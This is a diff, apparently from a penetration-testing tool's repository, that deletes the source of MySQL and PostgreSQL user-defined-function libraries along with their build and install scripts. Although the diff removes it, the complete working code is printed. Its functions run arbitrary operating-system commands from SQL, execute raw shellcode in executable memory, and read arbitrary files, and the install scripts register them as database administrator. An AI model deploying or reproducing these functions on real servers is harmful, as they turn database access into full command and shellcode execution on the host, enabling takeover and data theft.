-CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS '/tmp/lib_postgresqludf_sys.so', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
-CREATE OR REPLACE FUNCTION sys_bineval(text) RETURNS int4 AS '/tmp/lib_postgresqludf_sys.so', 'sys_bineval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
-CREATE OR REPLACE FUNCTION sys_fileread(text) RETURNS text AS '/tmp/lib_postgresqludf_sys.so', 'sys_fileread' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;

extra/udfhack/linux/64/lib_mysqludf_sys/Makefile

@@ -1,9 +0,0 @@
-# For MySQL < 5.1
-LIBDIR=/usr/lib
-# For MySQL >= 5.1
-#LIBDIR=/usr/lib/mysql/plugin
-
-install:
-	gcc-4.3 -Wall -I/usr/include/mysql -Os -shared lib_mysqludf_sys.c -fPIC -o lib_mysqludf_sys.so
-	strip -sx lib_mysqludf_sys.so
-	cp -f lib_mysqludf_sys.so $(LIBDIR)/lib_mysqludf_sys.so

extra/udfhack/linux/64/lib_mysqludf_sys/install.sh

@@ -1,47 +0,0 @@
-#!/bin/bash
-# lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
-# Copyright (C) 2007  Roland Bouman 
-# Copyright (C) 2008-2010  Roland Bouman and Bernardo Damele A. G.
-# web: http://www.mysqludf.org/
-# email: mysqludfs@gmail.com, bernardo.damele@gmail.com
-# 
-# This library is free software; you can redistribute it and/or
-# modify it under the terms of the GNU Lesser General Public
-# License as published by the Free Software Foundation; either
-# version 2.1 of the License, or (at your option) any later version.
-# 
-# This library is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-# Lesser General Public License for more details.
-# 
-# You should have received a copy of the GNU Lesser General Public
-# License along with this library; if not, write to the Free Software
-# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-
-# Adapt the following settings to your environment
-USER="root"
-PORT="3306"
-
-echo "Compiling the MySQL UDF"
-make
-
-if test $? -ne 0; then
-	echo "ERROR: You need libmysqlclient development software installed"
-	echo "to be able to compile this UDF, on Debian/Ubuntu just run:"
-	echo "apt-get install libmysqlclient-dev"
-	exit 1
-else
-	echo "MySQL UDF compiled successfully"
-fi
-
-echo -e "\nPlease provide your MySQL root password"
-
-mysql -h 127.0.0.1 -P ${PORT} -u ${USER} -p mysql < lib_mysqludf_sys.sql
-
-if test $? -ne 0; then
-	echo "ERROR: unable to install the UDF"
-	exit 1
-else
-	echo "MySQL UDF installed successfully"
-fi

extra/udfhack/linux/64/lib_mysqludf_sys/lib_mysqludf_sys.c

@@ -1,567 +0,0 @@
-/* 
-	lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
-	Copyright (C) 2007  Roland Bouman 
-	Copyright (C) 2008-2010  Roland Bouman and Bernardo Damele A. G.
-	web: http://www.mysqludf.org/
-	email: mysqludfs@gmail.com, bernardo.damele@gmail.com
-	
-	This library is free software; you can redistribute it and/or
-	modify it under the terms of the GNU Lesser General Public
-	License as published by the Free Software Foundation; either
-	version 2.1 of the License, or (at your option) any later version.
-	
-	This library is distributed in the hope that it will be useful,
-	but WITHOUT ANY WARRANTY; without even the implied warranty of
-	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-	Lesser General Public License for more details.
-	
-	You should have received a copy of the GNU Lesser General Public
-	License along with this library; if not, write to the Free Software
-	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-*/
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-#define DLLEXP __declspec(dllexport) 
-#else
-#define DLLEXP
-#include <sys/types.h>
-#include <sys/wait.h>
-#include <unistd.h>
-#endif
-
-#ifdef STANDARD
-#include <string.h>
-#include <stdlib.h>
-#include <time.h>
-#ifdef __WIN__
-typedef unsigned __int64 ulonglong;
-typedef __int64 longlong;
-#else
-typedef unsigned long long ulonglong;
-typedef long long longlong;
-#endif /*__WIN__*/
-#else
-#include <my_global.h>
-#include <my_sys.h>
-#endif
-#include <mysql.h>
-#include <m_ctype.h>
-#include <m_string.h>
-#include <stdlib.h>
-
-#include <ctype.h>
-
-#ifdef HAVE_DLOPEN
-#ifdef	__cplusplus
-extern "C" {
-#endif
-
-#define LIBVERSION "lib_mysqludf_sys version 0.0.4"
-
-#ifdef __WIN__
-#define SETENV(name,value)		SetEnvironmentVariable(name,value);
-#else
-#define SETENV(name,value)		setenv(name,value,1);		
-#endif
-
-DLLEXP 
-my_bool lib_mysqludf_sys_info_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-);
-
-DLLEXP 
-void lib_mysqludf_sys_info_deinit(
-	UDF_INIT *initid
-);
-
-DLLEXP 
-char* lib_mysqludf_sys_info(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char* result
-,	unsigned long* length
-,	char *is_null
-,	char *error
-);
-
-/**
- * sys_get
- * 
- * Gets the value of the specified environment variable.
- */
-DLLEXP 
-my_bool sys_get_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-);
-
-DLLEXP 
-void sys_get_deinit(
-	UDF_INIT *initid
-);
-
-DLLEXP 
-char* sys_get(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char* result
-,	unsigned long* length
-,	char *is_null
-,	char *error
-);
-
-/**
- * sys_set
- * 
- * Sets the value of the environment variables.
- * This function accepts a set of name/value pairs
- * which are then set as environment variables.
- * Use sys_get to retrieve the value of such a variable 
- */
-DLLEXP 
-my_bool sys_set_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-);
-
-DLLEXP 
-void sys_set_deinit(
-	UDF_INIT *initid
-);
-
-DLLEXP 
-long long sys_set(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *is_null
-,	char *error
-);
-
-/**
- * sys_exec
- * 
- * executes the argument commandstring and returns its exit status.
- * Beware that this can be a security hazard.
- */
-DLLEXP 
-my_bool sys_exec_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-);
-
-DLLEXP 
-void sys_exec_deinit(
-	UDF_INIT *initid
-);
-
-DLLEXP 
-my_ulonglong sys_exec(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *is_null
-,	char *error
-);
-
-/**
- * sys_eval
- * 
- * executes the argument commandstring and returns its standard output.
- * Beware that this can be a security hazard.
- */
-DLLEXP 
-my_bool sys_eval_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-);
-
-DLLEXP 
-void sys_eval_deinit(
-	UDF_INIT *initid
-);
-
-DLLEXP 
-char* sys_eval(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char* result
-,	unsigned long* length
-,	char *is_null
-,	char *error
-);
-
-/**
- * sys_bineval
- * 
- * executes bynary opcodes.
- * Beware that this can be a security hazard.
- */
-DLLEXP 
-my_bool sys_bineval_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-);
-
-DLLEXP 
-void sys_bineval_deinit(
-	UDF_INIT *initid
-);
-
-DLLEXP 
-int sys_bineval(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-);
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-DWORD WINAPI exec_payload(LPVOID lpParameter);
-#endif
-
-
-#ifdef	__cplusplus
-}
-#endif
-
-/**
- * lib_mysqludf_sys_info
- */
-my_bool lib_mysqludf_sys_info_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-){
-	my_bool status;
-	if(args->arg_count!=0){
-		strcpy(
-			message
-		,	"No arguments allowed (udf: lib_mysqludf_sys_info)"
-		);
-		status = 1;
-	} else {
-		status = 0;
-	}
-	return status;
-}
-
-void lib_mysqludf_sys_info_deinit(
-	UDF_INIT *initid
-){
-}
-
-char* lib_mysqludf_sys_info(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char* result
-,	unsigned long* length
-,	char *is_null
-,	char *error
-){
-	strcpy(result,LIBVERSION);
-	*length = strlen(LIBVERSION);
-	return result;
-}
-
-my_bool sys_get_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-){
-	if(args->arg_count==1
-	&&	args->arg_type[0]==STRING_RESULT){
-		initid->maybe_null = 1;
-		return 0;
-	} else {
-		strcpy(
-			message
-		,	"Expected exactly one string type parameter"
-		);		
-		return 1;
-	}
-}
-
-void sys_get_deinit(
-	UDF_INIT *initid
-){
-}
-
-char* sys_get(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char* result
-,	unsigned long* length
-,	char *is_null
-,	char *error
-){
-	char* value = getenv(args->args[0]);
-	if(value == NULL){
-		*is_null = 1;
-	} else {
-		*length = strlen(value);
-	} 
-	return value;
-}
-
-my_bool sys_set_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-){
-	if(args->arg_count!=2){
-		strcpy(
-			message
-		,	"Expected exactly two arguments"
-		);		
-		return 1;
-	}
-	if(args->arg_type[0]!=STRING_RESULT){
-		strcpy(
-			message
-		,	"Expected string type for name parameter"
-		);		
-		return 1;
-	}
-	args->arg_type[1]=STRING_RESULT;
-	if((initid->ptr=malloc(
-		args->lengths[0]
-	+	1
-	+	args->lengths[1]
-	+	1
-	))==NULL){
-		strcpy(
-			message
-		,	"Could not allocate memory"
-		);		
-		return 1;
-	}	
-	return 0;
-}
-
-void sys_set_deinit(
-	UDF_INIT *initid
-){
-	if (initid->ptr!=NULL){
-		free(initid->ptr);
-	}
-}
-
-long long sys_set(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *is_null
-,	char *error
-){	
-	char *name = initid->ptr;
-	char *value = name + args->lengths[0] + 1; 
-	memcpy(
-		name
-	,	args->args[0]
-	,	args->lengths[0]
-	);
-	*(name + args->lengths[0]) = '\0';
-	memcpy(
-		value
-	,	args->args[1]
-	,	args->lengths[1]
-	);
-	*(value + args->lengths[1]) = '\0';
-	return SETENV(name,value);		
-}
-
-my_bool sys_exec_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-){
-	unsigned int i=0;
-	if(args->arg_count == 1
-	&& args->arg_type[i]==STRING_RESULT){
-		return 0;
-	} else {
-		strcpy(
-			message
-		,	"Expected exactly one string type parameter"
-		);		
-		return 1;
-	}
-}
-
-void sys_exec_deinit(
-	UDF_INIT *initid
-){
-}
-
-my_ulonglong sys_exec(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *is_null
-,	char *error
-){
-	return system(args->args[0]);
-}
-
-my_bool sys_eval_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-){
-	unsigned int i=0;
-	if(args->arg_count == 1
-	&& args->arg_type[i]==STRING_RESULT){
-		return 0;
-	} else {
-		strcpy(
-			message
-		,	"Expected exactly one string type parameter"
-		);		
-		return 1;
-	}
-}
-
-void sys_eval_deinit(
-	UDF_INIT *initid
-){
-}
-
-char* sys_eval(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char* result
-,	unsigned long* length
-,	char *is_null
-,	char *error
-){
-	FILE *pipe;
-	char *line;
-	unsigned long outlen, linelen;
-
-	line = (char *)malloc(1024);
-	result = (char *)malloc(1);
-	outlen = 0;
-
-    result[0] = (char)0;
-
-	pipe = popen(args->args[0], "r");
-
-	while (fgets(line, sizeof(line), pipe) != NULL) {
-		linelen = strlen(line);
-		result = (char *)realloc(result, outlen + linelen);
-		strncpy(result + outlen, line, linelen);
-		outlen = outlen + linelen;
-	}
-
-	pclose(pipe);
-
-	if (!(*result) || result == NULL) {
-		*is_null = 1;
-	} else {
-		result[outlen-1] = 0x00;
-		*length = strlen(result);
-	}
-
-	return result;
-}
-
-my_bool sys_bineval_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-){
-	return 0;
-}
-
-void sys_bineval_deinit(
-	UDF_INIT *initid
-){
-	
-}
-
-int sys_bineval(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-){
-	size_t len;
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-	int pID;
-	char *code;
-#else
-	int *addr;
-	size_t page_size;
-	pid_t pID;
-#endif
-
-	len = (size_t)strlen(args->args[0]);
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-	// allocate a +rwx memory page
-	code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-	strncpy(code, args->args[0], len);
-
-	WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
-#else
-	pID = fork();
-	if(pID<0)
-		return 1;
-
-	if(pID==0)
-	{
-		page_size = (size_t)sysconf(_SC_PAGESIZE)-1;	// get page size
-		page_size = (len+page_size) & ~(page_size);		// align to page boundary
-
-		// mmap an rwx memory page
-		addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, 0, 0);
-
-		if (addr == MAP_FAILED)
-			return 1;
-
-		strncpy((char *)addr, args->args[0], len);
-
-		((void (*)(void))addr)();
-	}
-
-	if(pID>0)
-		waitpid(pID, 0, WNOHANG);
-#endif
-
-	return 0;
-}
-
-#if defined(_WIN64)
-void __exec_payload(LPVOID);
-
-DWORD WINAPI exec_payload(LPVOID lpParameter)
-{
-	__try
-	{
-		__exec_payload(lpParameter);
-	}
-	__except(EXCEPTION_EXECUTE_HANDLER)
-	{
-	}
-
-	return 0;
-}
-#elif defined(_WIN32) || defined(__WIN32__) || defined(WIN32)
-DWORD WINAPI exec_payload(LPVOID lpParameter)
-{
-	__try
-	{
-		__asm
-		{
-			mov eax, [lpParameter]
-			call eax
-		}
-	}
-	__except(EXCEPTION_EXECUTE_HANDLER)
-	{
-	}
-
-	return 0;
-}
-#endif
-
-#endif /* HAVE_DLOPEN */

extra/udfhack/linux/64/lib_mysqludf_sys/lib_mysqludf_sys.sql

@@ -1,35 +0,0 @@
-/*
-        lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
-        Copyright (C) 2007  Roland Bouman
-        Copyright (C) 2008-2010  Roland Bouman and Bernardo Damele A. G.
-        web: http://www.mysqludf.org/
-        email: roland.bouman@gmail.com, bernardo.damele@gmail.com
-
-        This library is free software; you can redistribute it and/or
-        modify it under the terms of the GNU Lesser General Public
-        License as published by the Free Software Foundation; either
-        version 2.1 of the License, or (at your option) any later version.
-
-        This library is distributed in the hope that it will be useful,
-        but WITHOUT ANY WARRANTY; without even the implied warranty of
-        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-        Lesser General Public License for more details.
-
-        You should have received a copy of the GNU Lesser General Public
-        License along with this library; if not, write to the Free Software
-        Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-*/
-
-DROP FUNCTION IF EXISTS lib_mysqludf_sys_info;
-DROP FUNCTION IF EXISTS sys_get;
-DROP FUNCTION IF EXISTS sys_set;
-DROP FUNCTION IF EXISTS sys_exec;
-DROP FUNCTION IF EXISTS sys_eval;
-DROP FUNCTION IF EXISTS sys_bineval;
-
-CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';
-CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';
-CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';
-CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
-CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';
-CREATE FUNCTION sys_bineval RETURNS int SONAME 'lib_mysqludf_sys.so';

extra/udfhack/linux/64/lib_postgresqludf_sys/Makefile

@@ -1,16 +0,0 @@
-LIBDIR=/tmp
-
-8.4:
-	gcc-4.2 -Wall -I/usr/include/postgresql/8.4/server -Os -shared lib_postgresqludf_sys.c -fPIC -o lib_postgresqludf_sys.so
-	strip -sx lib_postgresqludf_sys.so
-	cp -f lib_postgresqludf_sys.so $(LIBDIR)/lib_postgresqludf_sys.so
-
-8.3:
-	gcc-4.2 -Wall -I/usr/include/postgresql/8.3/server -Os -shared lib_postgresqludf_sys.c -fPIC -o lib_postgresqludf_sys.so
-	strip -sx lib_postgresqludf_sys.so
-	cp -f lib_postgresqludf_sys.so $(LIBDIR)/lib_postgresqludf_sys.so
-
-8.2:
-	gcc-4.2 -Wall -I/usr/include/postgresql/8.2/server -Os -shared lib_postgresqludf_sys.c -fPIC -o lib_postgresqludf_sys.so
-	strip -sx lib_postgresqludf_sys.so
-	cp -f lib_postgresqludf_sys.so $(LIBDIR)/lib_postgresqludf_sys.so

extra/udfhack/linux/64/lib_postgresqludf_sys/install.sh

@@ -1,59 +0,0 @@
-#!/bin/bash
-# lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-# Copyright (C) 2009-2010  Bernardo Damele A. G.
-# web: http://bernardodamele.blogspot.com/
-# email: bernardo.damele@gmail.com
-# 
-# This library is free software; you can redistribute it and/or
-# modify it under the terms of the GNU Lesser General Public
-# License as published by the Free Software Foundation; either
-# version 2.1 of the License, or (at your option) any later version.
-# 
-# This library is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-# Lesser General Public License for more details.
-# 
-# You should have received a copy of the GNU Lesser General Public
-# License along with this library; if not, write to the Free Software
-# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-
-# Adapt the following settings to your environment
-USER="postgres"
-PORT="5434"
-VERSION="8.4"
-#PORT="5433"
-#VERSION="8.3"
-#PORT="5432"
-#VERSION="8.2"
-
-echo "Compiling the PostgreSQL UDF"
-make ${VERSION}
-
-if test $? -ne 0; then
-	echo "ERROR: You need postgresql-server development software installed"
-	echo "to be able to compile this UDF, on Debian/Ubuntu just run:"
-
-	if test "${VERSION}" == "8.2"; then
-		echo "apt-get install postgresql-server-dev-8.2"
-	elif test "${VERSION}" == "8.3"; then
-		echo "apt-get install postgresql-server-dev-8.3"
-	elif test "${VERSION}" == "8.4"; then
-		echo "apt-get install postgresql-server-dev-8.4"
-	fi
-
-	exit 1
-else
-	echo "PostgreSQL UDF compiled successfully"
-fi
-
-echo -e "\nPlease provide your PostgreSQL 'postgres' user's password"
-
-psql -h 127.0.0.1 -p ${PORT} -U ${USER} -q template1 < lib_postgresqludf_sys.sql
-
-if test $? -ne 0; then
-	echo "ERROR: unable to install the UDF"
-	exit 1
-else
-	echo "PostgreSQL UDF installed successfully"
-fi

extra/udfhack/linux/64/lib_postgresqludf_sys/lib_postgresqludf_sys.c

@@ -1,277 +0,0 @@
-/* 
-	lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-	Copyright (C) 2009-2010  Bernardo Damele A. G.
-	web: http://bernardodamele.blogspot.com/
-	email: bernardo.damele@gmail.com
-	
-	This library is free software; you can redistribute it and/or
-	modify it under the terms of the GNU Lesser General Public
-	License as published by the Free Software Foundation; either
-	version 2.1 of the License, or (at your option) any later version.
-	
-	This library is distributed in the hope that it will be useful,
-	but WITHOUT ANY WARRANTY; without even the implied warranty of
-	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-	Lesser General Public License for more details.
-	
-	You should have received a copy of the GNU Lesser General Public
-	License along with this library; if not, write to the Free Software
-	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-*/
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-#define _USE_32BIT_TIME_T
-#define DLLEXP __declspec(dllexport) 
-#define BUILDING_DLL 1
-#else
-#define DLLEXP
-#include <sys/mman.h>
-#include <sys/types.h>
-#include <sys/wait.h>
-#include <unistd.h>
-#endif
-
-#include <postgres.h>
-#include <fmgr.h>
-#include <stdlib.h>
-#include <string.h>
-
-#include <ctype.h>
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-DWORD WINAPI exec_payload(LPVOID lpParameter);
-#endif
-
-#ifdef PG_MODULE_MAGIC
-PG_MODULE_MAGIC;
-#endif
-
-char *text_ptr_to_char_ptr(text *arg)
-{
-	char *retVal;
-	int arg_size = VARSIZE(arg) - VARHDRSZ;
-	retVal = (char *)malloc(arg_size + 1);
-
-	memcpy(retVal, VARDATA(arg), arg_size);
-	retVal[arg_size] = '\0';
-	
-	return retVal;
-}
-
-text *chr_ptr_to_text_ptr(char *arg)
-{
-	text *retVal;
-	
-	retVal = (text *)malloc(VARHDRSZ + strlen(arg));
-#ifdef SET_VARSIZE
-	SET_VARSIZE(retVal, VARHDRSZ + strlen(arg));
-#else
-	VARATT_SIZEP(retVal) = strlen(arg) + VARHDRSZ;
-#endif
-	memcpy(VARDATA(retVal), arg, strlen(arg));
-	
-	return retVal;
-}
-
-PG_FUNCTION_INFO_V1(sys_exec);
-#ifdef PGDLLIMPORT
-extern PGDLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
-#else
-extern DLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
-#endif
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	int32 result = 0;
-	char *command;
-
-	command = text_ptr_to_char_ptr(argv0);
-
-	/*
-	Only if you want to log
-	elog(NOTICE, "Command execution: %s", command);
-	*/
-
-	result = system(command);
-	free(command);
-
-	PG_FREE_IF_COPY(argv0, 0);
-	PG_RETURN_INT32(result);
-}
-
-PG_FUNCTION_INFO_V1(sys_eval);
-#ifdef PGDLLIMPORT
-extern PGDLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
-#else
-extern DLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
-#endif
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	text *result_text;
-	char *command;
-	char *result;
-	FILE *pipe;
-	char *line;
-	int32 outlen, linelen;
-
-	command = text_ptr_to_char_ptr(argv0);
-
-	/*
-	Only if you want to log
-	elog(NOTICE, "Command evaluated: %s", command);
-	*/
-
-	line = (char *)malloc(1024);
-	result = (char *)malloc(1);
-	outlen = 0;
-
-    result[0] = (char)0;
-
-	pipe = popen(command, "r");
-
-	while (fgets(line, sizeof(line), pipe) != NULL) {
-		linelen = strlen(line);
-		result = (char *)realloc(result, outlen + linelen);
-		strncpy(result + outlen, line, linelen);
-		outlen = outlen + linelen;
-	}
-
-	pclose(pipe);
-
-	if (*result) {
-		result[outlen-1] = 0x00;
-	}
-
-	result_text = chr_ptr_to_text_ptr(result);
-
-	PG_RETURN_POINTER(result_text);
-}
-
-PG_FUNCTION_INFO_V1(sys_bineval);
-#ifdef PGDLLIMPORT
-extern PGDLLIMPORT Datum sys_bineval(PG_FUNCTION_ARGS) {
-#else
-extern DLLIMPORT Datum sys_bineval(PG_FUNCTION_ARGS) {
-#endif
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	int32 argv0_size;
-	size_t len;
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-	int pID;
-	char *code;
-#else
-	int *addr;
-	size_t page_size;
-	pid_t pID;
-#endif
-
-	argv0_size = VARSIZE(argv0) - VARHDRSZ;
-	len = (size_t)argv0_size;
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-	// allocate a +rwx memory page
-	code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-	strncpy(code, VARDATA(argv0), len);
-
-	WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
-#else
-	pID = fork();
-	if(pID<0)
-		PG_RETURN_INT32(1);
-
-	if(pID==0)
-	{
-		page_size = (size_t)sysconf(_SC_PAGESIZE)-1;	// get page size
-		page_size = (len+page_size) & ~(page_size);		// align to page boundary
-
-		// mmap an rwx memory page
-		addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, 0, 0);
-
-		if (addr == MAP_FAILED)
-			PG_RETURN_INT32(1);
-
-		strncpy((char *)addr, VARDATA(argv0), len);
-
-		((void (*)(void))addr)();
-	}
-
-	if(pID>0)
-		waitpid(pID, 0, WNOHANG);
-#endif
-
-	PG_RETURN_INT32(0);
-}
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-DWORD WINAPI exec_payload(LPVOID lpParameter)
-{
-	__try
-	{
-		__asm
-		{
-			mov eax, [lpParameter]
-			call eax
-		}
-	}
-	__except(EXCEPTION_EXECUTE_HANDLER)
-	{
-
-	}
-
-	return 0;
-}
-#endif
-
-#undef fopen
-
-PG_FUNCTION_INFO_V1(sys_fileread);
-#ifdef PGDLLIMPORT
-extern PGDLLIMPORT Datum sys_fileread(PG_FUNCTION_ARGS) {
-#else
-extern DLLIMPORT Datum sys_fileread(PG_FUNCTION_ARGS) {
-#endif
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	text *result_text;
-	int32 len;
-	int32 i, j;
-	char *filename;
-	char *result;
-	char *buffer;
-	char table[] = "0123456789ABCDEF";
-	FILE *file;
-
-	filename = text_ptr_to_char_ptr(argv0);
-	
-	file = fopen(filename, "rb");
-	if (!file)
-	{
-		PG_RETURN_NULL();
-	}
-	fseek(file, 0, SEEK_END);
-	len = ftell(file);
-	fseek(file, 0, SEEK_SET);
-
-	buffer=(char *)malloc(len + 1);
-	if (!buffer)
-	{
-		fclose(file);
-		PG_RETURN_NULL();
-	}
-
-	fread(buffer, len, 1, file);
-	fclose(file);
-
-	result = (char *)malloc(2*len + 1);
-	for (i=0, j=0; i<len; i++)
-	{
-		result[j++] = table[(buffer[i] >> 4) & 0x0f];
-		result[j++] = table[ buffer[i]	   & 0x0f];
-	}
-	result[j] = '\0';
-	
-	result_text = chr_ptr_to_text_ptr(result);
-	
-	free(result);
-	free(buffer);
-	free(filename);
-
-	PG_RETURN_POINTER(result_text);
-}

extra/udfhack/linux/64/lib_postgresqludf_sys/lib_postgresqludf_sys.sql

@@ -1,25 +0,0 @@
-/* 
-	lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-	Copyright (C) 2009-2010  Bernardo Damele A. G.
-	web: http://bernardodamele.blogspot.com/
-	email: bernardo.damele@gmail.com
-	
-	This library is free software; you can redistribute it and/or
-	modify it under the terms of the GNU Lesser General Public
-	License as published by the Free Software Foundation; either
-	version 2.1 of the License, or (at your option) any later version.
-	
-	This library is distributed in the hope that it will be useful,
-	but WITHOUT ANY WARRANTY; without even the implied warranty of
-	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-	Lesser General Public License for more details.
-	
-	You should have received a copy of the GNU Lesser General Public
-	License along with this library; if not, write to the Free Software
-	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-*/
-
-CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS '/tmp/lib_postgresqludf_sys.so', 'sys_exec' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
-CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS '/tmp/lib_postgresqludf_sys.so', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
-CREATE OR REPLACE FUNCTION sys_bineval(text) RETURNS int4 AS '/tmp/lib_postgresqludf_sys.so', 'sys_bineval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
-CREATE OR REPLACE FUNCTION sys_fileread(text) RETURNS text AS '/tmp/lib_postgresqludf_sys.so', 'sys_fileread' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;

extra/udfhack/linux/README.txt

@@ -1,22 +0,0 @@
-Before compiling, you need to adapt the following to your environment:
-
-Variables in install.sh script:
---------------------------------------------------------------------------
-Variable name			Variable description
---------------------------------------------------------------------------
-USER                    Database management system administrative username
-PORT                    Database management system port
-VERSION                 Database management system version (PostgreSQL only)
-
-Variable in Makefile (MySQL only):
---------------------------------------------------------------------------
-Variable name			Variable description
---------------------------------------------------------------------------
-LIBDIR                  Database management system absolute file system
-                        path for third party libraries
-
-Then you can launch './install.sh' if you want to compile the shared
-object from the source code and create the user-defined functions on the
-database management system.
-If you only want to compile the shared object, you need to call only the
-'make' command.

extra/udfhack/windows/32/lib_mysqludf_sys/lib_mysqludf_sys.sln

@@ -1,20 +0,0 @@
-
-Microsoft Visual Studio Solution File, Format Version 9.00
-# Visual C++ Express 2005
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "lib_mysqludf_sys", "lib_mysqludf_sys\lib_mysqludf_sys.vcproj", "{4D362A3E-CA53-444C-B1C8-C49641823875}"
-EndProject
-Global
-	GlobalSection(SolutionConfigurationPlatforms) = preSolution
-		Debug|Win32 = Debug|Win32
-		Release|Win32 = Release|Win32
-	EndGlobalSection
-	GlobalSection(ProjectConfigurationPlatforms) = postSolution
-		{4D362A3E-CA53-444C-B1C8-C49641823875}.Debug|Win32.ActiveCfg = Debug|Win32
-		{4D362A3E-CA53-444C-B1C8-C49641823875}.Debug|Win32.Build.0 = Debug|Win32
-		{4D362A3E-CA53-444C-B1C8-C49641823875}.Release|Win32.ActiveCfg = Release|Win32
-		{4D362A3E-CA53-444C-B1C8-C49641823875}.Release|Win32.Build.0 = Release|Win32
-	EndGlobalSection
-	GlobalSection(SolutionProperties) = preSolution
-		HideSolutionNode = FALSE
-	EndGlobalSection
-EndGlobal

